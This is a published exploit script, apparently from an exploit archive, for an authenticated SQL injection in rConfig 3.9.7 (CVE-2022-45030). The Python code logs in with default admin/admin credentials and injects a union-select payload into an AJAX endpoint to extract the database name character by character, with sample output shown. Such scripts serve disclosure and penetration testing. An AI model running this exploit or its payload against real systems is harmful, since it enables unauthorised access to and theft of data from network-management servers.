rconfig version 3.9.7 suffers from a remote SQL injection vulnerability.
df3ba429f5e78218eb22753e367ddfe33daefa3c49241c3dca96529f31f60a8e
# Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated)
# Exploit Author: azhen
# Date: 10/12/2022
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <= v3.9.7
# Tested against Server Host: Linux
# CVE: CVE-2022-45030
import requests
import sys
import urllib3
urllib3.disable_warnings()
s = requests.Session()
# sys.argv.append("192.168.10.150") #Enter the hostname
if len(sys.argv) != 2:
print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
sys.exit(1)
host=sys.argv[1] #Enter the hostname
def get_data(host):
print("[+] Get db data...")
vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
query_exp = "database()"
result_data = ""
for i in range(1, 100):
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
# print(res.text)
a = chr(int(res.text[6:10]) - 1000)
if a == '\x00':
break
result_data += a
print(result_data)
print("[+] Database name: {}".format(result_data))
'''
output:
[+] Logging in...
[+] Get db data...
r
rc
rco
rcon
rconf
rconfi
rconfig
rconfigd
rconfigdb
[+] Database name: rconfigdb
'''
def login(host):
print("[+] Logging in...")
url = "https://"+host+":443/lib/crud/userprocess.php"
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
get_data(host)
login(host)